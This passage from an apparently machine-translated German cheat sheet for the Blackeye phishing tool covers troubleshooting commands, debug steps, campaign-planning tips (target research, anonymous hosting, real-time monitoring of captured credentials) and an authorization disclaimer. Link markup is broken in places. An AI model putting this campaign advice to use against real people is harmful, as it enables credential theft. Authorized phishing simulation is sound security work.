chmod +x blackeye.sh
PHP not found
sudo apt install php php-cli
Port already in use
sudo netstat -tulpn|grep :80 sudo kill -9 $(sudo lsof -t -i:80)
Template not loading
Check file permissions
Verify PHP configuration
Test with curl
Ngrok authentication failed
ngrok authtoken YOUR_TOKEN ```_
Debug Mode
```bash
Enable PHP error reporting
echo "error_reporting = E_ALL" >> /etc/php/7.4/cli/php.ini echo "display_errors = On" >> /etc/php/7.4/cli/php.ini
Check Apache/Nginx logs
tail -f /var/log/apache2/error.log tail -f /var/log/nginx/error.log
Test template manually
php -S localhost:8000 -t /path/to/template/ ```_
Best Practices
Kampagnenplanung
- Zielforschung: Zieldemografiken und Plattformnutzung verstehen
- Auswahl: Wählen Sie entsprechende Vorlagen für das Zielpublikum
- *Infrastruktur-Setup: Verwenden Sie sicheres und anonymes Hosting
- Test: Vollständige Testvorlagen vor dem Einsatz
- Monitoring: Implementieren Echtzeit-Capture Monitoring
Rechtliche und ethische Überlegungen
```bash
Authorized testing only
Obtain proper written authorization
Follow responsible disclosure
Protect captured data
Document all activities
Data protection measures
Encrypt captured credentials
Secure data transmission
Implement data retention policies
Regular security audits
```_
Leistungsoptimierung
```bash
Optimize for high traffic
Use CDN for static content
Implement caching
Monitor server resources
Scale horizontally if needed
```_
Ressourcen
- Blackeye GitHub Repository
- [thelinuxchoice Security Tools](__LINK_5___ -%20PHP-Dokumentation
- Ngrok-Dokumentation
- [OWASP Phishing Guide](LINK_5
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Blackeye Phishing Tool. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung haben, bevor Sie Phishing-Simulationen oder Penetrationstests durchführen. *